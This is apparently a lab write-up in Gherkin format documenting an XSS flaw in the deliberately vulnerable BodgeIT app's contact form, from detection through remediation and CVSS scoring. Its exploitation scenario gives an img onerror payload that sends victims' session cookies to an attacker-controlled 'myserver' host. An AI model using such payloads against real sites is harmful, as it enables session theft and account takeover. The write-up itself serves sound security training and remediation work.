## Version 1.4.1
## language: en

Feature:
  TOE:
    BodgeIT
  Category:
    Injection Flaws
  Location:
    bodgeit/contact.jsp - Access
  CWE:
    CWE-0079: Improper Neutralization of Input During Web Page Generation
    ('Cross-site Scripting') -base-
      https://cwe.mitre.org/data/definitions/79.html
    CWE-0074: Improper Neutralization of Special Elements in Output Used by a
    Downstream Component ('Injection') -class-
      https://cwe.mitre.org/data/definitions/74.html
    CWE-1019: Validate Inputs
      https://cwe.mitre.org/data/definitions/1019.html
  CAPEC:
    CAPEC-591: Reflected XSS -detailed-
      http://capec.mitre.org/data/definitions/591.html
    CAPEC-063: Cross-Site Scripting (XSS) -standard-
      http://capec.mitre.org/data/definitions/63.html
    CAPEC-242: Code Injection -meta-
      http://capec.mitre.org/data/definitions/242.html
  Rule:
    REQ.173: https://fluidattacks.com/web/en/rules/173/
  Goal:
    Run unintended JS code
  Recommendation:
    Sanitize user input

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running BodgeIT in a docker container at
    """
    http://localhost:8000/bodgeit/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/bodgeit/
    Then I can login and buy products as my own user

  Scenario: Static detection
  No input validation for unusual XSS payloads
    When I look at the code at "/bodgeit/root/contact.jsp"
    """
    ...
    18  // Strip script tags, because that will make everything alright...
    19  comments = comments.replace("<script>", "");
    20  comments = comments.replace("</script>", "");
    21  // And double quotes, just to make sure
    22  comments = comments.replace("\"", "");
    23
    24  PreparedStatement stmt = conn.prepareStatement("INSERT INTO Comments (na
    me, comment) VALUES (?, ?)");
    25  ResultSet rs = null;
    26  try {
    27      stmt.setString(1, username);
    28      stmt.setString(2, comments);
    29      stmt.execute();
    ...
    """
    Then I see it only checks for "<script>" tags

  Scenario: Dynamic detection
  Fuzzing for XSS
    Given I try to leave a feedback with "<script>alert(1)</script>"
    Then I get a response saying
    """
    Thank you for your feedback:
    alert(1)
    """
    Then I know it's stripping my "<script>" tags
    Then I try a different comment
    """
    <img src=# onerror=alert(1)>
    """
    Then I submit it and get an alert in the response (evidence)[alert.png]
    Then I know the site is vulnerable to XSS

  Scenario: Exploitation
  Exfiltrate sensitive data via XSS
    Given I know there's an XSS vuln
    Then I can use social engineering to make a user trigger it with the payload
    """
    <img src=# onerror=document.location='http://myserver/?c='+document.cookie>
    """
    Then I get their session cookies and can spoof their identity on the site

  Scenario: Remediation
  Sanitizing user input
    Given I Install OWASP Java Encoder in the project
    And patch the code as follows
    """
    ...
    18  // Strip script tags, because that will make everything alright...
    19  comments = Encoder.forHtml(comments);
    20  PreparedStatement stmt = conn.prepareStatement("INSERT INTO Comments (na
    me, comment) VALUES (?, ?)");
    21  ResultSet rs = null;
    22  try {
    23      stmt.setString(1, username);
    24      stmt.setString(2, comments);
    25      stmt.execute();
    ...
    """
    Then XSS isn't posible anymore

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    6.5/10 (Medium) - AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.0/10 (Medium) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    6.0/10 (Medium) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-02-14
